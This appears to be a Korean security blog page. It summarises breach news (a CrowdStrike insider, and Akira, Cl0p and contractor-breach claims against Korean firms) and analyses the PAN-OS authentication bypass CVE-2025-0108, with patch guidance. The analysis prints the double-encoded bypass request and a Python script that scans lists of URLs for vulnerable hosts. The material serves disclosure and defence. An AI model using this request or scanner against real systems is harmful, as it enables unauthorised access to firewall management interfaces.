사내·외 대시보드 화면과 옥타 싱글사인온 패널 등 주요 업무 시스템의 스크린샷 형태로 공개
> 이미지에는 업무용 리소스 링크를 비롯한 로그인 인터페이스 정보가 포함
※ 스캐터드 랩서스 헌터즈(Scattered Lapsus$ Hunters) : 스캐터드 스파이더, 랩서스, 샤이니헌터스 등 해킹 조직의 연합

- 해커들, 공격 경로가 외부 벤더사인 Gainsight 플랫폼을 통해 이뤄졌다고 주장
> 크라우드스트라이크 자체 조사 결과 시스템 침입은 없었으며, 단순히 직원이 자신의 PC 화면을 캡처해 외부로 전달한 행위로 확인
> 해킹 조직 샤이니헌터스가 해당 직원에게 2만5000달러를 대가로 내부 네트워크 접근 권한을 요구한 정황도 포착

- 크라우드스트라이크 보안운영센터(SOC), 해당 의심 행위를 신속히 탐지해 즉시 대응에 나섰으며, 문제 직원은 곧바로 해고
시스템 손상이나 고객 영향은 전혀 없었고 고객 보호는 완벽히 유지됐다고 강조

- 해킹 조직들이 반복적으로 내부자 포섭 시도를 늘리고 있음
> 내부자 위협은 기술적 방어 조치만으로 막기 어렵고, 대규모 보안 기업조차 예외가 될 수 없음을 보여주는 사례로 평가
> 외부 공격자가 기업 내부자를 금전적으로 포섭하려는 시도는 앞으로 더욱 증가할 것으로 예상
행위 기반 모니터링, 비정상 인증 탐지, 최소 권한 원칙 적용을 기본 정책으로 강화하는 것이 중요
기타 - Scattered Lapsus$ Hunters
> 최근 글로벌 기업들을 대상으로 세일즈포스 계정 탈취 및 보이스 피싱 공격을 주도해온 복합적 범죄 조직
> 올해 초부터 구글, 시스코, 알리안츠 생명, 아디다스, 워크데이 등 주요 기업의 세일즈포스 인스턴스를 침해한 것으로 알려짐
> Lapsus$, ShinyHunters, Scattered Spider 등 기존 난폭한 피싱·침입 조직의 연합 형태로 활동
> 최근에는 ShinySp1d3r라는 새로운 랜섬웨어 서비스(RaaS) 운영으로 공격 영역을 확장
> 세일즈포스 비밀 키를 탈취해 280곳 이상의 기업 인스턴스를 침해했다고 주장

 

보안뉴스

 

쿠팡, 고객 4500여명 개인정보 노출돼 정부 신고... “결제 관련 정보는 보호 돼”

쿠팡에서 고객 4500여명의 개인정보가 노출되는 사고가 발생했다. 이에 쿠팡은 과학기술정보통신부와 한국인터넷진흥원, 개인정보보호위원회에 신고했다.

www.boannews.com

 

“믿었던 직원이”…크라우드스트라이크, 내부자 해킹 공모 적발

글로벌 사이버보안 기업 크라우드스트라이크(CrowdStrike)가 최근 사내 정보를 외부 해킹조직에 넘긴 직원 한 명을 해고했다고 밝혔다. 보안 업계는 이번 사건을 ‘인적 내부 위험’이 기술적 취약

www.boannews.com

 

넷마블, 해킹 당해 개인정보 유출… “주민번호는 제외”

국내 메이저 게임사 중 하나인 넷마블에서 개인정보 유출됐다. 회사는 공식 홈페이지를 통해 지난 22일 외부 해킹으로 인해 자사 PC 게임 사이트 이용 고객과 일부 임직원의 정보가 유출된 정황

www.boannews.com

 

'보안뉴스' 카테고리의 다른 글

또 터진 ‘공급망 보안’... 오픈AI, 협력사 해킹에 고객정보 노출 불똥 외 1건  (0) 2025.11.28
메시징 앱 ‘라인’, 아시아 사용자들 사이버 첩보 노출 치명적 취약점 발견돼 외 1건  (0) 2025.11.26
[긴급 속보] 아키라 랜섬웨어 조직, LG에너지솔루션 내부자료 1.7TB 유출 주장…아직 샘플 DB 공개전 외 2건  (0) 2025.11.23
[이슈] 중국 보안기업 ‘Knownsec’ 해킹당해…정부 지원 사이버 무기와 해외 표적 명단 대량 유출 외 1건  (0) 2025.11.12
“중국 해커들의 장기 침투, 오래된 취약점이 새로운 위협보다 더 위협적” 외 1건  (0) 2025.11.10
요약 - 해킹을 통해 국내 기업의 내부 자료를 탈취 및 유포를 주장하는 공격 조직 증가
- 공격자가 데이터 샘플을 공개하기 시작 전 침해 여부와 범위를 파악하는 것이 중요
내용 - 랜섬웨어 조직 Akira, 다크웹을 통해 LG에너지솔루션 공격 및 데이터 공개 협박
> Akira, LG에너지솔루션 미국공장에서 확보한 방대한 데이터를 공개하겠다고 협박
약 1.67TB 규모의 기업 문서와 46GB SQL 데이터베이스가 곧 업로드될 것이라고 주장
> 해당 문서에는 임직원 개인정보부터 기밀 프로젝트, 계약서, 재무 자료 등 기업의 핵심 자산이 대거 포함된 것으로 주장

> 유출된 자료에 미국·한국 여권, 비자, 의료 문서, 주민등록증 이미지, 직원 주소·연락처·이메일, R&D 프로젝트 문서, 비밀유지계약(NDA), 고객 및 파트너사 자료, 재무 문서, 각종 계약서 등이 포함
> 특히 SQL DB까지 확보했다는 점은 단순 문서 파일이 아니라 운영 시스템 내부까지 완전히 접근했다는 것

복수의 핵심 시스템이 동시에 침해됐을 가능성이 있음
> 실제 유출이 사실일 경우 기술 스파이 활동이나 해외 경쟁사로의 정보 흘림 등 산업 안보 측면에서 대형 사고로 이어질 가능성 존재

> 언급한 정보 중에는 특히 여권·비자·의료 정보 등 고위험 개인정보가 포함돼 있어 임직원 피해도 심각하게 우려

> 이번 사건의 파급력은 기술 유출을 넘어 글로벌 공급망 전반의 보안 리스크로 이어질 수 있음
> LG에너지솔루션은 테슬라·GM·현대차 등 세계 주요 완성차 업체와 협력
> 유출된 계약 문서나 고객 정보가 악용될 경우 협력사 대상 스피어피싱, 계약서 위조, 계정 탈취 등 2차 공격 위험

> 배터리·철강·반도체 장비 등 한국 제조 대기업은 제조 공정 특성상 계정 관리가 복잡하고, 협력사 계정 노출이 잦아 랜섬웨어에 취약
> 제조업은 IT와 OT 환경이 밀접하게 연결돼 공격자에게 큰 이득을 제공하는 구조로 단순 금전 목적이 아닌 기술 정보 확보를 노린 복합 공격도 배제할 수 없음

> 향후 조치는 단순 내부 보안 강화 수준을 넘어 국가 차원의 산업기술 보호 체계 가동이 필요하다는 목소리
전사 로그 분석, AD 계정 권한 검증, 백업 시스템 무결성 점검, 협력사 계정 이력 조사 등이 시급
> R&D 기술 문서 유출이 확인되면 산업부와 국가정보원 국가핵심기술 보호부서와의 공조가 필수적

> 실제 침해가 발생했는지 여부와 자료 유출의 범위는 아직 확인되지 않음
> 아키라가 올린 데이터 목록과 공격 패턴을 고려할 때 향후 사태가 상당한 파장을 일으킬 수 있다는 우려
==================================================================================
- 세아베스틸지주가 협력업체 해킹을 통해 내부 소스코드와 인증정보가 외부 유출 의혹 제기
> “SeAH Holdings Data Breach”라는 제목으로 올라왔으며, 게시자는 자신이 최근 수행한 계약업체 해킹을 통해 세아홀딩스의 일부 내부 데이터 탈취 주장
> 게시물에는 세아홀딩스 로고와 함께 구체적인 데이터 목록, 샘플 파일 다운로드 링크 등이 포함
> 세아홀딩스 측에 확인 결과, '세아홀딩스' 홈페이지는 '세아베스틸지주'와 분리된 서버로 별도 관리되고 있으며, 현재 해킹 시도 흔적은 확인되지 않았다고 전함

■ 해커 “소스코드·구성 파일·API 키·하드코딩된 인증정보 확보” 주장
> 세아베스틸지주에서 소스코드, 구성 파일, 액세스 키, API Keys, 하드코딩된 인증정보 등의 민감 데이터 유출 주장
> 직접 세아베스틸지주를 공격한 것이 아니라 협력 중인 계약업체의 시스템을 해킹해 내부 정보가 연쇄적으로 유출된 ‘공급망 공격’ 형태라고 주장

> 종합하면, 해킹을 당한 서버는 세아베스틸지주의 서버가 아닌 홈페이지를 개발했던 업체의 테스트 환경인 '개발 서버'가 해킹을 당한 것으로 확인 
> 통상적으로 홈페이지 개발 시 '개발 서버'를 구성한 이후 해당 코드를 실제 '운영 서버'에 반영하는 방식으로 진행
> 이번 문제가 된 서버는 홈페이지 개발 업체의 서버로 현재 '세아베스틸지주'가 운영하는 서버는 아님
> 현재 세아베스틸지주 '운영 서버'로는 해킹 시도는 없었던 것으로 확인

> 홈페이지 개발 업체에서는 해킹 발생 직후 '개발 서버'를 폐쇄하고 한국인터넷진흥원에 즉시 신고를 진행하고 엑세스 토큰 변경 등의 조치 진행 완료
> 또 서버의 잠재 리스크를 방지하고 보안을 강화하는 차원에서 '세아베스틸지주'는 홈페이지 소스 코드 취약점 재검토/변경 진행 및 보안 진단을 강화해 관리  

■ 샘플 파일까지 공개돼 위험성 커
> 이번 사고에서는 888명의 정보가 침해된 것으로 추정되며, 해커는 이를 뒷받침하기 위한 목적으로 일부 파일을 샘플 형태로 게시
> 샘플까지 공개된 상황은 해당 데이터가 실제로 유출되었을 가능성이 매우 높다는 의미

■ 해커는 다크포럼 ‘GOD’ 등급…최근 여러 기업 유출 게시글 올려
> 해당 계정은 다크포럼 내에서 ‘GOD’ 등급을 보유하고 있으며, 게시물 66개, 쓰레드 52개, 가입일 2025년 6월, 평판 411 등 활발한 활동을 이어오고 높은 평판을 받고 있는 것으로 확인
> 최근 몇 달 동안 다수 기업의 데이터 유출 게시물을 올린 바 있어, 이번 사례 역시 연속된 공격의 일환으로 분석

■ “협력사 보안 취약 시 대기업도 공격에 무방비”
> 이번 사고가 협력업체 보안이 대기업 전체의 보안 체계를 무너뜨릴 수 있다는 공급망 위협의 전형적인 사례라고 지적
> 이어 다음과 같은 긴급 조치를 조언
즉각적인 API 키·액세스 키 폐기 및 재발급
소스코드 저장소 접근 권한 전면 재점검
협력업체 보안 수준 평가 및 모니터링 강화
침해지표(IOCs)에 기반한 전사적 탐지 활동 수행

> 또한 코드 기반 시스템을 운영하는 기업의 경우, 협력업체와의 연결 지점이 가장 위험한 취약 지점이 될 수 있음
==================================================================================
- Cl0p이 운영하는 다크웹 유출 사이트에 대한항공 기내식 공급업체 대한항공씨앤드서비스가 새로운 피해 기업으로 등록

■ 클롭 유출 사이트, “KOREANAIRCND.COM – PAGE CREATED” 문구만 공개
> 다크웹 클롭 유출 페이지에서는 ‘KOREANAIRCND.COM – PAGE CREATED, YOU SOME TIME TO RESPOND AND CONTACT US’라는 문구가 게재
> 이는 클롭이 피해 기업 전용 페이지를 생성한 뒤 협상을 압박하기 위해 사용하는 전형적인 첫 단계
> 현재 페이지에는 데이터 샘플, 파일 목록, 스크린샷, 유출 용량, 요구 조건 등 어떤 정보도 공개되지 않은 상태
> 침해 사실 여부는 클롭 측 주장일 뿐, 구체적 피해 범위는 아직 확인되지 않은 상황
> 다크웹 모니터링 사이트에서도 동일하게 “피해자명·도메인·그룹명”만 자동 수집돼 있으며, 탈취 데이터나 몸값 관련 정보는 전혀 제공되지 않음

■ 현재까지는 “협상 압박용 초기 페이지”…데이터 공개 단계로 넘어갈지 주목
> 클롭은 과거에도 피해 기업의 이름만 먼저 공개한 뒤, 협상 진행, 연락 지연, 단가 협상 실패 등의 상황이 벌어지면 순차적으로 샘플 데이터→전체 데이터를 공개하는 방식으로 압박
> 전문가들은 이번 대한항공씨앤드서비스를 공개한 것도 “협상 유도 단계의 티저(Teaser) 페이지”로 판단

■ 클롭이 실제로 무엇을 탈취했는지는 아직 확인 불가
> 현재 다크웹 페이지에는 어떤 종류의 데이터가 탈취됐는지 어떠한 단서도 존재하지 않음
> 또한 대한항공씨앤드서비스 및 대한항공 측에서도 현재까지 별도의 공식 입장을 내지 않은 상태
> 항공사와 정기적 문서 교환 및 납품 과정에서 대량 데이터 생성 등 공급망 침해를 통한 항공사 2차 피해 가능성이 있음

■ 보안전문가 “지금은 초기 단계…해당 기업은 철저한 내부 시스템 이상징후 조사 필요”
> 현재 상황을 “클롭이 페이지를 만들었다는 것은 최소한 기업의 네트워크나 시스템 일부에 접근했을 가능성
> 지금은 데이터 공개 이전의 초기 압박 단계로 보이며, 기업이 조용히 대응하거나 협상 중일 가능성도 있을 것

> 또한 실제 대응을 위해서는 다음과 같은 절차가 필요하다고 조언
최근 2주~1개월간 시스템 접근 로그, 외부 전송 기록 점검
파일 서버·ERP·클라우드 접근 권한 모니터링
계정 탈취(인포스틸러 감염) 여부 확인
백업 시스템 무결성 검증
항공사 연계 시스템 긴급 점검
다크웹 추가 게시물 지속 모니터링

> 전문가들은 특히 “공격자가 데이터 샘플을 공개하기 시작하면 피해 범위가 한눈에 드러나기 때문에, 그 전 단계에서 침해 여부와 범위를 파악하는 것이 무엇보다 중요하다”고 강조

> 현재까지 데이터 탈취 정황이나 피해 규모는 확인되지 않음
> 다만 클롭의 공격 패턴과 공급망 타깃 전략을 고려하면 이번 사건은 향후 추가 정보 공개 여부에 따라 이슈로 확대될 가능성이 큼
기타 - Akira
> 최근 2년간 한국 제조업을 집중적으로 공격
> VPN 계정 탈취, 협력사 계정 도용, 백업 시스템 파괴 등 전형적인 침투 패턴을 보임
> 내부망 진입 후에는 액티브 디렉토리를 장악하고 문서 서버·백업 서버를 암호화하며, 협상 결렬 시 유출 사이트에 데이터를 전면 공개
> 최근 한국 제조·중공업 분야에서만 최소 수십여 건 이상의 공격을 시도해 왔으며, 다수의 기업을 유출 협박
> 협상에 응하지 않는 기업을 상대로 대규모 유출을 실행해 왔으며, 이 과정에서 수십 테라바이트 단위의 R&D 문서가 해외로 흘러들어간 사례 존재

- 소스코드와 API 키, 액세스 키 등은 기업 내부 시스템과 클라우드 자원에 직접 접근할 수 있는 핵심 정보
> 특히 인증정보가 외부에 노출될 경우 다음과 같은 심각한 후속 공격이 발생할 수 있음

- 클롭의 다른 사례를 보면, 실제 공개 전 다음과 같은 패턴이 빈번하게 나탐
> 피해 기업 이름만 먼저 공개->연락이 없으면 직원정보·계약서 등 일부 샘플 공개->최종 협상 결렬 시 수십GB~수TB 단위 전체 데이터 업로드->심각할 경우, 고객·거래처·언론·감독기관에 직접 이메일 발송

 

보안뉴스

 

[긴급 속보] 아키라 랜섬웨어 조직, LG에너지솔루션 내부자료 1.7TB 유출 주장…아직 샘플 DB 공개

글로벌 배터리 2차전지기업인 국내 LG에너지솔루션이 해외 랜섬웨어 조직 ‘아키라(Akira)’의 공격 표적이 됐다는 주장이 다크웹을 통해 제기됐다.데일리시큐가 위

www.dailysecu.com

 

[단독] 해커 “세아베스틸지주, 협력사 해킹으로 API키·내부 소스코드 유출” 주장…해킹 포럼에

특수강 및 금속소재 산업을 기반으로 한 세아베스틸지주가 협력업체 해킹을 통해 내부 소스코드와 인증정보가 외부로 유출됐다는 의혹이 제기됐다. 데일리시큐는 위협 인텔

www.dailysecu.com

 

[단독] 클롭 랜섬웨어, 대한항공 기내식 공급사 해킹 당한 기업으로 지목…데이터 탈취 여부는

악명높은 랜섬웨어 조직 ‘클롭(Cl0p)’이 운영하는 다크웹 유출 사이트에 대한항공 기내식 공급업체 ‘대한항공씨앤드서비스(Korean Air CND Service

www.dailysecu.com

 

'보안뉴스' 카테고리의 다른 글

메시징 앱 ‘라인’, 아시아 사용자들 사이버 첩보 노출 치명적 취약점 발견돼 외 1건  (0) 2025.11.26
쿠팡, 고객 4500여명 개인정보 노출돼 정부 신고... “결제 관련 정보는 보호 돼” 외 3건  (0) 2025.11.26
[이슈] 중국 보안기업 ‘Knownsec’ 해킹당해…정부 지원 사이버 무기와 해외 표적 명단 대량 유출 외 1건  (0) 2025.11.12
“중국 해커들의 장기 침투, 오래된 취약점이 새로운 위협보다 더 위협적” 외 1건  (0) 2025.11.10
챗GPT서 민감정보 유출 가능한 ‘7가지 공격기법‘ 공개돼 외 1건  (0) 2025.11.09

1. CVE-2025-0108

[사진 1] CVE-2025-0108 [1]

- Nginx → Apache → PHP로 이어지는 인증 처리 과정에서 발생하는 Path Confusion 문제를 악용한 인증 우회 취약점

영향받는 버전
PAN-OS
- 11.2.0 이상 ~ 11.2.4-h4 미만
- 11.1.0 이상 ~ 11.1.6-h1 미만
- 11.1.2 이상 ~ 11.1.2-h18 미만
- 10.2.7 이상 ~ 10.2.7-h24 미만
- 10.2.8 이상 ~ 10.2.8-h21 미만
- 10.2.9 이상 ~ 10.2.9-h21 미만
- 10.2.10 이상 ~ 10.2.10-h14 미만
- 10.2.11 이상 ~ 10.2.11-h12 미만
- 10.2.12 이상 ~ 10.2.12-h6 미만
- 10.2.13 이상 ~ 10.2.13-h3 미만
- 10.1.0 이상 ~ 10.1.14-h9 미만

2.주요내용

- PAN-OS의 관리 인터페이스는 다음과 같은 방식으로 웹 요청을 처리 [2]

1. Nginx 단계

- 클라이언트의 요청을 수신하여 인증이 필요한지 여부 결정

> 특정 경로(/unauth/)가 포함된 경우 인증이 필요 없는 것으로 처리하며, X-pan-AuthCheck 헤더를 off로 설정

if ($uri ~ ^\/unauth\/.+$) {
  set $panAuthCheck 'off';
}

if ($uri = /php/logout.php) {
  set $panAuthCheck 'off';
}

# ...

2. Apache 단계

- 전달된 요청을 다시 처리하고, mod_rewrite를 통해 특정 경로를 재작성

> 경로를 해석하고 내부 리디렉션을 수행하는 과정에서 URL을 한 번 더 디코딩

<Location "/">
    # Turns off DirectorySlash as it uses input host in redirect thus a vulnerability.
    # Have not found a way to fix that.
    DirectorySlash off
    RewriteEngine on
    RewriteRule ^(.*)(\/PAN_help\/)(.*)\.(css|js|html|htm)$ $1$2$3.$4.gz [QSA,L]
    AddEncoding gzip .gz

    Options Indexes FollowSymLinks
    Require all granted
</Location>

3. PHP 단계

- 전달된 요청의 헤더를 기반으로 인증 여부 판단 및 요청 처리

> X-pan-AuthCheck: off 상태일 경우, 인증이 불필요한 것으로 간주

if (
    $_SERVER['HTTP_X_PAN_AUTHCHECK'] != 'off'
    && $_SERVER['PHP_SELF'] !== '/CA/ocsp'
    &&  $_SERVER['PHP_SELF'] !== '/php/login.php'
    && stristr($_SERVER['REMOTE_HOST'], '127.0.0.1') === false
) {
    // ... check authentication ...
}

 

2.1 Apache의 경로 재해석 문제

- Apache는 RewriteRule을 처리할 때 내부 리디렉션을 수행하는데, 이 과정에서 URL이 다시 한 번 디코딩

> 이중 디코딩 문제를 활용해 공격자는 인증 우회를 시도할 수 있음

 

- 공격자는 다음과 같은 요청을 통해 인증을 우회할 수 있음

GET /unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css HTTP/1.1
Host: my.testing.environment
Connection: close

 Nginx 단계

   ⒜ %252e%252e는 첫 번째 URL 디코딩에서 %2e%2e로 변환

   ⒝ URL에 "/unauth/" 경로가 포함되어 있어 X-pan-AuthCheck: off가 설정

   ⒞ 전체 URL "/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css"을 Apache로 전달

② Apache 단계

   ⒜ %252e%252e는 디코딩되어 %2e%2e로 변환

   ⒝ RewriteRule과 일치하므로 URL 재작성 되고, %2e%2e가 다시 디코딩

   ⒞ URL  /php/ztp_gate.php/PAN_help/x.css.gz를 mod_php를 통해 PHP에 전달

③ PHP 단계

   ⒜ /php/ztp_gate.php로 전달된 요청이 X-pan-AuthCheck: off 상태이므로 인증 없이 실행

[사진 2] 취약점 실행 단계

3. PoC

- /unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css URL로 GET 요청 전송 [3]

import requests
import argparse
from urllib.parse import urljoin
import ssl
import logging

# Disable SSL warnings
ssl._create_default_https_context = ssl._create_unverified_context
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

# Logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(message)s', handlers=[
    logging.StreamHandler(), 
    logging.FileHandler("scan_results.log")
])

def read_file(file_path):
    """Read URLs from a file and return them as a list."""
    try:
        with open(file_path, 'r') as file:
            return file.read().splitlines()
    except Exception as e:
        logging.error(f"Error reading file {file_path}: {e}")
        return []

def check_vulnerability(url):
    """
    Check if the given URL is vulnerable to CVE-2025-0108.
    A vulnerable site should return 'Zero Touch Provisioning' in the response.
    """
    protocols = ['http://', 'https://']
    target_path = "/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css"

    for protocol in protocols:
        target_url = urljoin(protocol + url.lstrip('http://').lstrip('https://'), target_path)
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) Gecko/20100101 Firefox/72.0"
        }

        try:
            response = requests.get(target_url, verify=False, headers=headers, timeout=10)
            if response.status_code == 200 and 'Zero Touch Provisioning' in response.text:
                message = f"Vulnerable: {url} - CVE-2025-0108 Vulnerability (Authentication Bypass)!"
                logging.info(message)
                return True
            else:
                logging.debug(f"Not vulnerable: {url} - Response code: {response.status_code}")
        except requests.exceptions.RequestException as e:
            logging.warning(f"Error connecting to {url}: {e}")

    return False

if __name__ == "__main__":
    
    parser = argparse.ArgumentParser(description="Check for CVE-2025-0108 vulnerability (Authentication Bypass).")
    parser.add_argument("-u", "--url", help="Single URL to check")
    parser.add_argument("-f", "--file", help="File containing a list of URLs to check")
    
    args = parser.parse_args()
    url = args.url
    file = args.file

    if url:
        check_vulnerability(url)
    elif file:
        urls = read_file(file)
        if urls:
            for u in urls:
                check_vulnerability(u)
        else:
            logging.error("No URLs found in the file.")
    else:
        logging.error("Please provide a URL or a file containing URLs to check.")
        logging.info("Usage: python CVE_2025_0108_V1.py -u <URL> or python CVE_2025_0108_V1.py -f <file_with_urls>")

    # About
    logging.info("\nAuthor: Sohaib E.B. - sohaib.eu")

4. 대응방안

- 벤더사 제공 업데이트 적용 [4][5][6]

취약점 제품명 영향받는 버전 해결 버전
CVE-2025-0108 PAN-OS 11.2.0 이상 ~ 11.2.4-h4 미만 11.2.4-h4 이상
11.1.0 이상 ~ 11.1.6-h1 미만
11.1.2 이상 ~ 11.1.2-h18 미만		 11.1.6-h1 이상
11.1.2-h18 이상
10.2.7 이상 ~ 10.2.7-h24 미만
10.2.8 이상 ~ 10.2.8-h21 미만
10.2.9 이상 ~ 10.2.9-h21 미만
10.2.10 이상 ~ 10.2.10-h14 미만
10.2.11 이상 ~ 10.2.11-h12 미만
10.2.12 이상 ~ 10.2.12-h6 미만
10.2.13 이상 ~ 10.2.13-h3 미만		 10.2.7-h24 이상
10.2.8-h21 이상
10.2.9-h21 이상
10.2.10-h14 이상
10.2.11-h12 이상
10.2.12-h6 이상
10.2.13-h3 이상
10.1.0 이상 ~ 10.1.14-h9 미만 10.1.14-h9 이상

※ PAN-OS 11.0 버전은 24.11.17 지원 종료되어 업데이트 계획 없음

5. 참고

[1] https://nvd.nist.gov/vuln/detail/CVE-2025-0108
[2] https://www.assetnote.io/resources/research/nginx-apache-path-confusion-to-auth-bypass-in-pan-os
[3] https://github.com/sohaibeb/CVE-2025-0108
[4] https://security.paloaltonetworks.com/CVE-2025-0108
[5] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&nttId=71664&menuNo=205020
[6] https://asec.ahnlab.com/ko/86384/
[7] https://www.bleepingcomputer.com/news/security/hackers-exploit-authentication-bypass-in-palo-alto-networks-pan-os/
[8] https://hackyboiz.github.io/2025/04/03/clalxk/CVE-2025-0108/

'취약점 > By-Pass' 카테고리의 다른 글

Oracle Identity Manager 인증 우회를 통한 RCE 취약점 (CVE-2025-61757)  (0) 2025.11.26
Fortinet FortiWeb 경로 탐색 취약점 (CVE-2025-64446)  (0) 2025.11.17
vBulletin 인증 우회 및 원격 코드 실행 취약점 (CVE-2025-48827, CVE-2025-48828)  (0) 2025.06.10
Ivanti Endpoint Manager Mobile 인증 우회 및 원격 코드 실행 취약점 (CVE-2025-4427, CVE-2025-4428)  (1) 2025.05.25
CrushFTP 인증 우회 취약점 (CVE-2025-31161)  (0) 2025.04.26

+ Recent posts

티스토리툴바